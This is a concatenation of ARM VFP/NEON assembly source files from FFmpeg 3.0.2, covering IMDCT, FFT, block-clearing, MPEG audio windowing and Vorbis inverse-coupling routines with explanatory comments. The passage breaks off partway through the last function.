vstr s12, [OUT_HI, #-\out_offset_tail-4]
vstr s13, [OUT_HI, #-\out_offset_tail-12]
vstr s14, [OUT, #+\out_offset_tail+12]
vstr s15, [OUT, #+\out_offset_tail+4]
.endif
.ifnc "\head",""
vmul.f s12, s0, s16 @ vector operation
vldmdb TCOS_HI!, {\tcos_s2_head,\tcos_s3_head}
.endif
.endm
/* void ff_imdct_half_vfp(FFTContext *s,
 * FFTSample *output,
 * const FFTSample *input)
 *
 * Half IMDCT using VFP short-vector mode (RunFast, vector length 4).
 * Two code paths: a fully-unrolled one for mdct_bits == 6 (n = 64)
 * and a rolled one (label 10:) for all other sizes. Both do
 * pre-rotation -> s->fft_calc (ff_fft16_vfp for n = 64) -> post-rotation.
 * FPSCR is saved/restored around the vector-mode sections since the
 * FFT and the caller expect scalar mode.
 */
function ff_imdct_half_vfp, export=1
ldr ip, [CONTEXT, #5*4] @ mdct_bits
teq ip, #6
bne 10f @ generic sizes handled below
.set n, 1<<6
.set n2, n/2
.set n4, n/4
.set n8, n/8
push {v1-v5,lr}
vpush {s16-s27}
fmrx OLDFPSCR, FPSCR
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
mov OUT, ORIGOUT
ldr REVTAB, [CONTEXT, #2*4]
ldr TCOS, [CONTEXT, #6*4]
ldr TSIN, [CONTEXT, #7*4]
.set k, 0
.rept n8/2
prerotation_innerloop
.endr
fmxr FPSCR, OLDFPSCR @ back to scalar mode for the FFT
mov a1, OUT
bl X(ff_fft16_vfp)
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
.set k, 0
@ software-pipelined post-rotation: prologue, steady state, epilogue
postrotation_innerloop , head
.rept n8/2 - 1
postrotation_innerloop tail, head
.endr
postrotation_innerloop tail
fmxr FPSCR, OLDFPSCR
vpop {s16-s27}
pop {v1-v5,pc}
10: @ generic (rolled) path for any mdct_bits
push {v1-v6,sl,fp,lr}
vpush {s16-s27}
fmrx OLDFPSCR, FPSCR
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
mov lr, #1
mov OUT, ORIGOUT
ldr REVTAB, [CONTEXT, #2*4]
ldr TCOS, [CONTEXT, #6*4]
ldr TSIN, [CONTEXT, #7*4]
mov lr, lr, lsl ip @ lr = n
push {CONTEXT,OLDFPSCR} @ spill: their registers are reused as aliases
add IN_HI, IN, lr, lsl #1
add REVTAB_HI, REVTAB, lr, lsr #1
add TCOS_HI, TCOS, lr
add TSIN_HI, TSIN, lr
0: prerotation_innerloop_rolled
teq IN, IN_HI @ pointers meet in the middle
bne 0b
ldmia sp, {CONTEXT,OLDFPSCR}
mov ORIGOUT, OUT
fmxr FPSCR, OLDFPSCR @ scalar mode for the FFT callback
ldr ip, [CONTEXT, #9*4]
blx ip @ s->fft_calc(s, output)
pop {CONTEXT,OLDFPSCR}
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
ldr ip, [CONTEXT, #5*4] @ mdct_bits
fmxr FPSCR, lr
mov lr, #1
mov lr, lr, lsl ip @ lr = n
sub TCOS, TCOS, lr, lsr #1 @ rewind tables to the middle
sub TSIN, TSIN, lr, lsr #1
add OUT_HI, OUT, lr, lsl #1
add TCOS_HI, TCOS, lr
add TSIN_HI, TSIN, lr
@ pipelined post-rotation: prologue, 2-deep steady state, epilogue
postrotation_innerloop_rolled , head, s20, s21, s22, s23,, 0
b 1f
0: add OUT, OUT, #32
sub OUT_HI, OUT_HI, #32
postrotation_innerloop_rolled tail, head, s20, s21, s22, s23, s24, 0, -16
1: postrotation_innerloop_rolled tail, head, s24, s25, s26, s27, s20, 16, 0
teq TSIN, TSIN_HI
bne 0b
postrotation_innerloop_rolled tail,,,,,, s24,, 16
fmxr FPSCR, OLDFPSCR
vpop {s16-s27}
pop {v1-v6,sl,fp,pc}
endfunc
@ Release all register aliases so they don't leak into later code.
.unreq CONTEXT
.unreq ORIGOUT
.unreq IN
.unreq OUT
.unreq REVTAB
.unreq TCOS
.unreq TSIN
.unreq OLDFPSCR
.unreq J0
.unreq J1
.unreq J2
.unreq J3
.unreq REVTAB_HI
.unreq IN_HI
.unreq OUT_HI
.unreq TCOS_HI
.unreq TSIN_HI
@ ===========================================================================
@ ffmpeg-3.0.2/libavcodec/arm/fft_neon.S
@ (from repo Akagi201/ffmpeg-xcode)
@ ===========================================================================
/*
* ARM NEON optimised FFT
*
* Copyright (c) 2009 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2009 Naotoshi Nojiri
*
* This algorithm (though not any of the implementation details) is
* based on libdjbfft by D. J. Bernstein.
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#define M_SQRT1_2 0.70710678118654752440
@ In-place 4-point float FFT. r0 = FFTComplex (float) array,
@ 16-byte aligned. Pure add/sub butterflies (twiddles are +/-1, +/-i).
function fft4_neon
vld1.32 {d0-d3}, [r0,:128]
vext.32 q8, q1, q1, #1 @ i2,r3 d3=i3,r2
vsub.f32 d6, d0, d1 @ r0-r1,i0-i1
vsub.f32 d7, d16, d17 @ r3-r2,i2-i3
vadd.f32 d4, d0, d1 @ r0+r1,i0+i1
vadd.f32 d5, d2, d3 @ i2+i3,r2+r3
vadd.f32 d1, d6, d7
vsub.f32 d3, d6, d7
vadd.f32 d0, d4, d5
vsub.f32 d2, d4, d5
vst1.32 {d0-d3}, [r0,:128]
bx lr
endfunc
@ In-place 8-point float FFT. r0 = FFTComplex (float) array, 16-byte
@ aligned. The odd half is twiddled by sqrt(1/2) (the 0x3f3504f3
@ single-precision constant built with movw/movt) with sign patterns
@ in d28/d29/d31, then combined with the 4-point result.
function fft8_neon
mov r1, r0
vld1.32 {d0-d3}, [r1,:128]!
vld1.32 {d16-d19}, [r1,:128]
movw r2, #0x04f3 @ sqrt(1/2)
movt r2, #0x3f35
eor r3, r2, #1<<31 @ -sqrt(1/2)
vdup.32 d31, r2
vext.32 q11, q1, q1, #1 @ i2,r3,i3,r2
vadd.f32 d4, d16, d17 @ r4+r5,i4+i5
vmov d28, r3, r2 @ {-w, w}
vadd.f32 d5, d18, d19 @ r6+r7,i6+i7
vsub.f32 d17, d16, d17 @ r4-r5,i4-i5
vsub.f32 d19, d18, d19 @ r6-r7,i6-i7
vrev64.32 d29, d28
vadd.f32 d20, d0, d1 @ r0+r1,i0+i1
vadd.f32 d21, d2, d3 @ r2+r3,i2+i3
vmul.f32 d26, d17, d28 @ -a2r*w,a2i*w
vext.32 q3, q2, q2, #1
vmul.f32 d27, d19, d29 @ a3r*w,-a3i*w
vsub.f32 d23, d22, d23 @ i2-i3,r3-r2
vsub.f32 d22, d0, d1 @ r0-r1,i0-i1
vmul.f32 d24, d17, d31 @ a2r*w,a2i*w
vmul.f32 d25, d19, d31 @ a3r*w,a3i*w
vadd.f32 d0, d20, d21
vsub.f32 d2, d20, d21
vadd.f32 d1, d22, d23
vrev64.32 q13, q13
vsub.f32 d3, d22, d23
vsub.f32 d6, d6, d7
vadd.f32 d24, d24, d26 @ a2r+a2i,a2i-a2r t1,t2
vadd.f32 d25, d25, d27 @ a3r-a3i,a3i+a3r t5,t6
vadd.f32 d7, d4, d5
vsub.f32 d18, d2, d6
vext.32 q13, q12, q12, #1
vadd.f32 d2, d2, d6
vsub.f32 d16, d0, d7
vadd.f32 d5, d25, d24
vsub.f32 d4, d26, d27
vadd.f32 d0, d0, d7
vsub.f32 d17, d1, d5
vsub.f32 d19, d3, d4
vadd.f32 d3, d3, d4
vadd.f32 d1, d1, d5
vst1.32 {d16-d19}, [r1,:128]
vst1.32 {d0-d3}, [r0,:128]
bx lr
endfunc
@ In-place 16-point float FFT. r0 = FFTComplex (float) array, 16-byte
@ aligned. An 8-point FFT on the even half (inlined, interleaved with
@ the loads of the odd half) plus two twiddled 4-point combines using
@ ff_cos_16 and the pmmp/mppm sign-pattern tables. Results are stored
@ de-interleaved with vst2.
function fft16_neon
movrel r1, mppm
vld1.32 {d16-d19}, [r0,:128]! @ q8{r0,i0,r1,i1} q9{r2,i2,r3,i3}
pld [r0, #32]
vld1.32 {d2-d3}, [r1,:128]
vext.32 q13, q9, q9, #1
vld1.32 {d22-d25}, [r0,:128]! @ q11{r4,i4,r5,i5} q12{r6,i5,r7,i7}
vadd.f32 d4, d16, d17
vsub.f32 d5, d16, d17
vadd.f32 d18, d18, d19
vsub.f32 d19, d26, d27
vadd.f32 d20, d22, d23
vsub.f32 d22, d22, d23
vsub.f32 d23, d24, d25
vadd.f32 q8, q2, q9 @ {r0,i0,r1,i1}
vadd.f32 d21, d24, d25
vmul.f32 d24, d22, d2
vsub.f32 q9, q2, q9 @ {r2,i2,r3,i3}
vmul.f32 d25, d23, d3
vuzp.32 d16, d17 @ {r0,r1,i0,i1}
vmul.f32 q1, q11, d2[1]
vuzp.32 d18, d19 @ {r2,r3,i2,i3}
vrev64.32 q12, q12
vadd.f32 q11, q12, q1 @ {t1a,t2a,t5,t6}
vld1.32 {d24-d27}, [r0,:128]! @ q12{r8,i8,r9,i9} q13{r10,i10,r11,i11}
vzip.32 q10, q11
vld1.32 {d28-d31}, [r0,:128] @ q14{r12,i12,r13,i13} q15{r14,i14,r15,i15}
vadd.f32 d0, d22, d20
vadd.f32 d1, d21, d23
vsub.f32 d2, d21, d23
vsub.f32 d3, d22, d20
sub r0, r0, #96 @ rewind to the start of the buffer
vext.32 q13, q13, q13, #1
vsub.f32 q10, q8, q0 @ {r4,r5,i4,i5}
vadd.f32 q8, q8, q0 @ {r0,r1,i0,i1}
vext.32 q15, q15, q15, #1
vsub.f32 q11, q9, q1 @ {r6,r7,i6,i7}
vswp d25, d26 @ q12{r8,i8,i10,r11} q13{r9,i9,i11,r10}
vadd.f32 q9, q9, q1 @ {r2,r3,i2,i3}
vswp d29, d30 @ q14{r12,i12,i14,r15} q15{r13,i13,i15,r14}
vadd.f32 q0, q12, q13 @ {t1,t2,t5,t6}
vadd.f32 q1, q14, q15 @ {t1a,t2a,t5a,t6a}
movrelx r2, X(ff_cos_16)
vsub.f32 q13, q12, q13 @ {t3,t4,t7,t8}
vrev64.32 d1, d1
vsub.f32 q15, q14, q15 @ {t3a,t4a,t7a,t8a}
vrev64.32 d3, d3
movrel r3, pmmp
vswp d1, d26 @ q0{t1,t2,t3,t4} q13{t6,t5,t7,t8}
vswp d3, d30 @ q1{t1a,t2a,t3a,t4a} q15{t6a,t5a,t7a,t8a}
vadd.f32 q12, q0, q13 @ {r8,i8,r9,i9}
vadd.f32 q14, q1, q15 @ {r12,i12,r13,i13}
vld1.32 {d4-d5}, [r2,:64] @ ff_cos_16 twiddles
vsub.f32 q13, q0, q13 @ {r10,i10,r11,i11}
vsub.f32 q15, q1, q15 @ {r14,i14,r15,i15}
vswp d25, d28 @ q12{r8,i8,r12,i12} q14{r9,i9,r13,i13}
vld1.32 {d6-d7}, [r3,:128] @ pmmp sign pattern
vrev64.32 q1, q14
vmul.f32 q14, q14, d4[1]
vmul.f32 q1, q1, q3
vmla.f32 q14, q1, d5[1] @ {t1a,t2a,t5a,t6a}
vswp d27, d30 @ q13{r10,i10,r14,i14} q15{r11,i11,r15,i15}
vzip.32 q12, q14
vadd.f32 d0, d28, d24
vadd.f32 d1, d25, d29
vsub.f32 d2, d25, d29
vsub.f32 d3, d28, d24
vsub.f32 q12, q8, q0 @ {r8,r9,i8,i9}
vadd.f32 q8, q8, q0 @ {r0,r1,i0,i1}
vsub.f32 q14, q10, q1 @ {r12,r13,i12,i13}
mov r1, #32 @ store stride in bytes
vadd.f32 q10, q10, q1 @ {r4,r5,i4,i5}
vrev64.32 q0, q13
vmul.f32 q13, q13, d5[0]
vrev64.32 q1, q15
vmul.f32 q15, q15, d5[1]
vst2.32 {d16-d17},[r0,:128], r1
vmul.f32 q0, q0, q3
vst2.32 {d20-d21},[r0,:128], r1
vmul.f32 q1, q1, q3
vmla.f32 q13, q0, d5[0] @ {t1,t2,t5,t6}
vmla.f32 q15, q1, d4[1] @ {t1a,t2a,t5a,t6a}
vst2.32 {d24-d25},[r0,:128], r1
vst2.32 {d28-d29},[r0,:128]
vzip.32 q13, q15
sub r0, r0, #80
vadd.f32 d0, d30, d26
vadd.f32 d1, d27, d31
vsub.f32 d2, d27, d31
vsub.f32 d3, d30, d26
vsub.f32 q13, q9, q0 @ {r10,r11,i10,i11}
vadd.f32 q9, q9, q0 @ {r2,r3,i2,i3}
vsub.f32 q15, q11, q1 @ {r14,r15,i14,i15}
vadd.f32 q11, q11, q1 @ {r6,r7,i6,i7}
vst2.32 {d18-d19},[r0,:128], r1
vst2.32 {d22-d23},[r0,:128], r1
vst2.32 {d26-d27},[r0,:128], r1
vst2.32 {d30-d31},[r0,:128]
bx lr
endfunc
@ Float FFT combine pass shared by all def_fft sizes.
@   r0 = z, r1 = wre twiddle table (ff_cos_N), r2 = n = n4/2
@ Combines four sub-blocks z[0], z[o1], z[o2], z[o3] two complex
@ values at a time; wre is walked forwards (r1), wim backwards (r5).
@ The first iteration is peeled because wre[0] = 1 needs no multiply
@ on the q10 pair.
function fft_pass_neon
push {r4-r6,lr}
mov r6, r2 @ n
lsl r5, r2, #3 @ 2 * n * sizeof FFTSample
lsl r4, r2, #4 @ 2 * n * sizeof FFTComplex
lsl r2, r2, #5 @ 4 * n * sizeof FFTComplex
add r3, r2, r4
add r4, r4, r0 @ &z[o1]
add r2, r2, r0 @ &z[o2]
add r3, r3, r0 @ &z[o3]
vld1.32 {d20-d21},[r2,:128] @ {z[o2],z[o2+1]}
movrel r12, pmmp
vld1.32 {d22-d23},[r3,:128] @ {z[o3],z[o3+1]}
add r5, r5, r1 @ wim
vld1.32 {d6-d7}, [r12,:128] @ pmmp
vswp d21, d22
vld1.32 {d4}, [r1,:64]! @ {wre[0],wre[1]}
sub r5, r5, #4 @ wim--
vrev64.32 q1, q11
vmul.f32 q11, q11, d4[1]
vmul.f32 q1, q1, q3
vld1.32 {d5[0]}, [r5,:32] @ d5[0] = wim[-1]
vmla.f32 q11, q1, d5[0] @ {t1a,t2a,t5a,t6a}
vld2.32 {d16-d17},[r0,:128] @ {z[0],z[1]}
sub r6, r6, #1 @ n--
vld2.32 {d18-d19},[r4,:128] @ {z[o1],z[o1+1]}
vzip.32 q10, q11
vadd.f32 d0, d22, d20
vadd.f32 d1, d21, d23
vsub.f32 d2, d21, d23
vsub.f32 d3, d22, d20
vsub.f32 q10, q8, q0
vadd.f32 q8, q8, q0
vsub.f32 q11, q9, q1
vadd.f32 q9, q9, q1
vst2.32 {d20-d21},[r2,:128]! @ {z[o2],z[o2+1]}
vst2.32 {d16-d17},[r0,:128]! @ {z[0],z[1]}
vst2.32 {d22-d23},[r3,:128]! @ {z[o3],z[o3+1]}
vst2.32 {d18-d19},[r4,:128]! @ {z[o1],z[o1+1]}
sub r5, r5, #8 @ wim -= 2
1:
vld1.32 {d20-d21},[r2,:128] @ {z[o2],z[o2+1]}
vld1.32 {d22-d23},[r3,:128] @ {z[o3],z[o3+1]}
vswp d21, d22
vld1.32 {d4}, [r1]! @ {wre[0],wre[1]}
vrev64.32 q0, q10
vmul.f32 q10, q10, d4[0]
vrev64.32 q1, q11
vmul.f32 q11, q11, d4[1]
vld1.32 {d5}, [r5] @ {wim[-1],wim[0]}
vmul.f32 q0, q0, q3
sub r5, r5, #8 @ wim -= 2
vmul.f32 q1, q1, q3
vmla.f32 q10, q0, d5[1] @ {t1,t2,t5,t6}
vmla.f32 q11, q1, d5[0] @ {t1a,t2a,t5a,t6a}
vld2.32 {d16-d17},[r0,:128] @ {z[0],z[1]}
subs r6, r6, #1 @ n--
vld2.32 {d18-d19},[r4,:128] @ {z[o1],z[o1+1]}
vzip.32 q10, q11
vadd.f32 d0, d22, d20
vadd.f32 d1, d21, d23
vsub.f32 d2, d21, d23
vsub.f32 d3, d22, d20
vsub.f32 q10, q8, q0
vadd.f32 q8, q8, q0
vsub.f32 q11, q9, q1
vadd.f32 q9, q9, q1
vst2.32 {d20-d21}, [r2,:128]! @ {z[o2],z[o2+1]}
vst2.32 {d16-d17}, [r0,:128]! @ {z[0],z[1]}
vst2.32 {d22-d23}, [r3,:128]! @ {z[o3],z[o3+1]}
vst2.32 {d18-d19}, [r4,:128]! @ {z[o1],z[o1+1]}
bne 1b
pop {r4-r6,pc}
endfunc
@ Define fft<n>_neon recursively: an n/2 FFT on the first half, two
@ n/4 FFTs on the quarters, then the shared combine pass with the
@ ff_cos_<n> table (8 bytes per float complex element, hence the
@ #\n4*2*8 / #\n4*3*8 byte offsets). Entry points are cache-aligned.
.macro def_fft n, n2, n4
.align 6
function fft\n\()_neon
push {r4, lr}
mov r4, r0
bl fft\n2\()_neon
add r0, r4, #\n4*2*8
bl fft\n4\()_neon
add r0, r4, #\n4*3*8
bl fft\n4\()_neon
mov r0, r4
pop {r4, lr}
movrelx r1, X(ff_cos_\n)
mov r2, #\n4/2
b fft_pass_neon @ tail call; returns to our caller
endfunc
.endm
@ Instantiate fft32_neon .. fft65536_neon from the recursive template.
def_fft 32, 16, 8
def_fft 64, 32, 16
def_fft 128, 64, 32
def_fft 256, 128, 64
def_fft 512, 256, 128
def_fft 1024, 512, 256
def_fft 2048, 1024, 512
def_fft 4096, 2048, 1024
def_fft 8192, 4096, 2048
def_fft 16384, 8192, 4096
def_fft 32768, 16384, 8192
def_fft 65536, 32768, 16384
@ Entry point: dispatch to the fft<2^nbits>_neon routine.
@   r0 = FFTContext (first word is nbits), r1 = z buffer
@ The table is indexed by nbits-2 (smallest size is fft4).
function ff_fft_calc_neon, export=1
ldr r2, [r0] @ nbits
sub r2, r2, #2
movrel r3, fft_tab_neon
ldr r3, [r3, r2, lsl #2]
mov r0, r1 @ the fft routines take z in r0
bx r3
endfunc
@ Bit-reversal permutation of the input, done via the context's
@ revtab: scatter z into tmp_buf at the permuted positions (two
@ packed 16-bit indices per revtab word), then copy tmp_buf back
@ over z linearly.
@   r0 = FFTContext, r1 = z buffer
function ff_fft_permute_neon, export=1
push {r4,lr}
mov r12, #1
ldr r2, [r0] @ nbits
ldr r3, [r0, #12] @ tmp_buf
ldr r0, [r0, #8] @ revtab
lsl r12, r12, r2 @ r12 = n
mov r2, r12
1: @ scatter pass: tmp_buf[revtab[i]] = z[i]
vld1.32 {d0-d1}, [r1,:128]!
ldr r4, [r0], #4 @ two packed revtab entries
uxth lr, r4
uxth r4, r4, ror #16
add lr, r3, lr, lsl #3 @ scale to 8-byte complex slots
add r4, r3, r4, lsl #3
vst1.32 {d0}, [lr,:64]
vst1.32 {d1}, [r4,:64]
subs r12, r12, #2
bgt 1b
sub r1, r1, r2, lsl #3 @ rewind z
1: @ copy pass: z = tmp_buf
vld1.32 {d0-d3}, [r3,:128]!
vst1.32 {d0-d3}, [r1,:128]!
subs r2, r2, #4
bgt 1b
pop {r4,pc}
endfunc
@ Dispatch table for ff_fft_calc_neon, indexed by nbits-2.
const fft_tab_neon, relocate=1
.word fft4_neon
.word fft8_neon
.word fft16_neon
.word fft32_neon
.word fft64_neon
.word fft128_neon
.word fft256_neon
.word fft512_neon
.word fft1024_neon
.word fft2048_neon
.word fft4096_neon
.word fft8192_neon
.word fft16384_neon
.word fft32768_neon
.word fft65536_neon
endconst
@ Sign-pattern vectors used by the twiddle multiplies:
@ pmmp = {+1,-1,-1,+1}; mppm = the same pattern applied to sqrt(1/2).
const pmmp, align=4
.float +1.0, -1.0, -1.0, +1.0
endconst
const mppm, align=4
.float -M_SQRT1_2, M_SQRT1_2, M_SQRT1_2, -M_SQRT1_2
endconst
@ ===========================================================================
@ ffmpeg-3.0.2/libavcodec/arm/blockdsp_neon.S
@ (from repo Akagi201/ffmpeg-xcode)
@ ===========================================================================
/*
* ARM NEON optimised block functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Zero one 64-element int16 DCT block (128 bytes) at r0 (16-byte
@ aligned). Two zeroed q registers let each store clear 32 bytes,
@ so four stores cover the whole block.
function ff_clear_block_neon, export=1
vmov.i64 q0, #0
vmov.i64 q1, #0
.rept 4
vst1.16 {d0-d3}, [r0,:128]! @ 4 x 32 = 128 bytes
.endr
bx lr
endfunc
@ Zero six consecutive 64-element int16 DCT blocks (6 * 128 = 768
@ bytes) at r0 (16-byte aligned). Same two-register, 32-bytes-per-
@ store scheme as ff_clear_block_neon, unrolled 24 times.
function ff_clear_blocks_neon, export=1
vmov.i64 q0, #0
vmov.i64 q1, #0
.rept 24
vst1.16 {d0-d3}, [r0,:128]! @ 24 x 32 = 768 bytes
.endr
bx lr
endfunc
@ ===========================================================================
@ ffmpeg-3.0.2/libavcodec/arm/mpegaudiodsp_fixed_armv6.S
@ (from repo Akagi201/ffmpeg-xcode)
@ ===========================================================================
/*
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ No-op macro: used as the default for sum8's \rsb argument so the
@ negation instructions expand to nothing when negation is not wanted.
.macro skip args:vararg
.endm
@ Multiply-accumulate 8 window/synth-buffer tap pairs into the 64-bit
@ accumulator \lo:\hi.  \w = window base, \p = synth pointer (pre-
@ incremented by one word on entry), \offs = extra word offset into the
@ window.  Successive taps are 64 words (one sub-band stride) apart.
@ Passing \rsb=rsb negates each window coefficient before the MAC
@ (subtractive taps); the default "skip" omits the negation entirely.
@ Clobbers \t1-\t4; loads are interleaved with smlal to hide latency.
.macro sum8 lo, hi, w, p, t1, t2, t3, t4, rsb=skip, offs=0
ldr \t1, [\w, #4*\offs]
ldr \t2, [\p, #4]!
\rsb \t1, \t1, #0
.irpc i, 135
ldr \t3, [\w, #4*64*\i+4*\offs]
ldr \t4, [\p, #4*64*\i]
smlal \lo, \hi, \t1, \t2
\rsb \t3, \t3, #0
ldr \t1, [\w, #4*64*(\i+1)+4*\offs]
ldr \t2, [\p, #4*64*(\i+1)]
smlal \lo, \hi, \t3, \t4
\rsb \t1, \t1, #0
.endr
ldr \t3, [\w, #4*64*7+4*\offs]
ldr \t4, [\p, #4*64*7]
smlal \lo, \hi, \t1, \t2
\rsb \t3, \t3, #0
smlal \lo, \hi, \t3, \t4
.endm
@ Convert the 64-bit fixed-point accumulator \lo:\hi into a saturated
@ 16-bit sample in \rd (arithmetic shift right by 24 via lsr/orr, then
@ ssat clamps to signed 16 bits).  The low 24 fractional bits are left
@ in \lo and \hi is cleared, so the residue carries into the next
@ sample's accumulation (dither-style error feedback).
.macro round rd, lo, hi
lsr \rd, \lo, #24
bic \lo, \lo, #0xff000000
orr \rd, \rd, \hi, lsl #8
mov \hi, #0
ssat \rd, #16, \rd
.endm
@ void ff_mpadsp_apply_window_fixed(int32_t *synth_buf, int32_t *window,
@                                   int32_t *dither_state,
@                                   int16_t *samples, ptrdiff_t incr)
@ r0 = synth_buf, r1 = window, r2 = dither_state, r3 = samples,
@ [sp, #40] = incr (after the push below).  Produces 32 output samples:
@ sample 0 and sample 16 directly, then 15 symmetric pairs written
@ forwards from samples and backwards from samples2.
@ NOTE(review): relies on strh_post/strh_dpost helper macros from
@ asm.S for post-incremented halfword stores — not visible here.
function ff_mpadsp_apply_window_fixed_armv6, export=1
push {r2,r4-r11,lr}
@ Mirror the first 128 bytes of synth_buf to synth_buf+512 so the
@ windowing below can read past the end without wrapping.
add r4, r0, #4*512 @ synth_buf + 512
.rept 4
ldm r0!, {r5-r12}
stm r4!, {r5-r12}
.endr
ldr r4, [sp, #40] @ incr
sub r0, r0, #4*17 @ synth_buf + 16
ldr r8, [r2] @ sum:low
add r2, r0, #4*32 @ synth_buf + 48
rsb r5, r4, r4, lsl #5 @ 31 * incr
lsl r4, r4, #1
asr r9, r8, #31 @ sum:high
add r5, r3, r5, lsl #1 @ samples2
add r6, r1, #4*32 @ w2
str r4, [sp, #40]
@ Sample 0: additive taps from synth_buf+16, subtractive from +48.
sum8 r8, r9, r1, r0, r10, r11, r12, lr
sum8 r8, r9, r1, r2, r10, r11, r12, lr, rsb, 32
round r10, r8, r9
strh_post r10, r3, r4
@ Main loop: 15 iterations, each producing one forward and one
@ backward sample; r8:r9 and r4:r7 accumulate the two sums in parallel.
mov lr, #15
1:
ldr r12, [r0, #4]!
ldr r11, [r6, #-4]!
ldr r10, [r1, #4]!
.irpc i, 0246
.if \i
ldr r11, [r6, #4*64*\i]
ldr r10, [r1, #4*64*\i]
.endif
rsb r11, r11, #0
smlal r8, r9, r10, r12
ldr r10, [r0, #4*64*(\i+1)]
.ifeq \i
smull r4, r7, r11, r12
.else
smlal r4, r7, r11, r12
.endif
ldr r11, [r6, #4*64*(\i+1)]
ldr r12, [r1, #4*64*(\i+1)]
rsb r11, r11, #0
smlal r8, r9, r12, r10
.iflt \i-6
ldr r12, [r0, #4*64*(\i+2)]
.else
ldr r12, [r2, #-4]!
.endif
smlal r4, r7, r11, r10
.endr
.irpc i, 0246
ldr r10, [r1, #4*64*\i+4*32]
rsb r12, r12, #0
ldr r11, [r6, #4*64*\i+4*32]
smlal r8, r9, r10, r12
ldr r10, [r2, #4*64*(\i+1)]
smlal r4, r7, r11, r12
ldr r12, [r1, #4*64*(\i+1)+4*32]
rsb r10, r10, #0
ldr r11, [r6, #4*64*(\i+1)+4*32]
smlal r8, r9, r12, r10
.iflt \i-6
ldr r12, [r2, #4*64*(\i+2)]
.else
ldr r12, [sp, #40] @ reload 2*incr for the stores below
.endif
smlal r4, r7, r11, r10
.endr
round r10, r8, r9
adds r8, r8, r4
adc r9, r9, r7
strh_post r10, r3, r12
round r11, r8, r9
subs lr, lr, #1
strh_dpost r11, r5, r12
bgt 1b
@ Sample 16: purely subtractive taps at window offset 33.
sum8 r8, r9, r1, r0, r10, r11, r12, lr, rsb, 33
pop {r4} @ r4 = dither_state (saved r2)
round r10, r8, r9
str r8, [r4] @ store fractional residue back
strh r10, [r3]
pop {r4-r11,pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 3,050
|
ffmpeg-3.0.2/libavcodec/arm/vorbisdsp_neon.S
|
/*
* ARM NEON optimised DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ void ff_vorbis_inverse_coupling(float *mag, float *ang, intptr_t blocksize)
@ r0 = mag, r1 = ang, r2 = blocksize (assumed a positive multiple of 4
@ -- TODO confirm against caller), both arrays 16-byte aligned.
@ In-place magnitude/angle channel decoupling.  q10 holds the float
@ sign-bit mask (1<<31); per element the ang value's sign is flipped by
@ mag's sign bit (veor), then the result is added to or subtracted from
@ mag depending on the integer compare vcle.s32 (ang <= 0 as raw bits).
@ The main loop (1:) is software-pipelined two blocks deep: r3/r12
@ trail r0/r1 as store pointers; 2: drains the pipeline and 3: handles
@ the blocksize == 4 case without pipelining.
function ff_vorbis_inverse_coupling_neon, export=1
vmov.i32 q10, #1<<31
subs r2, r2, #4
mov r3, r0
mov r12, r1
beq 3f
@ Prologue: process the first 4 elements into q11/q12.
vld1.32 {d24-d25},[r1,:128]!
vld1.32 {d22-d23},[r0,:128]!
vcle.s32 q8, q12, #0
vand q9, q11, q10
veor q12, q12, q9
vand q2, q12, q8
vbic q3, q12, q8
vadd.f32 q12, q11, q2
vsub.f32 q11, q11, q3
1: vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d0-d1}, [r0,:128]!
vcle.s32 q8, q1, #0
vand q9, q0, q10
veor q1, q1, q9
vst1.32 {d24-d25},[r3, :128]!
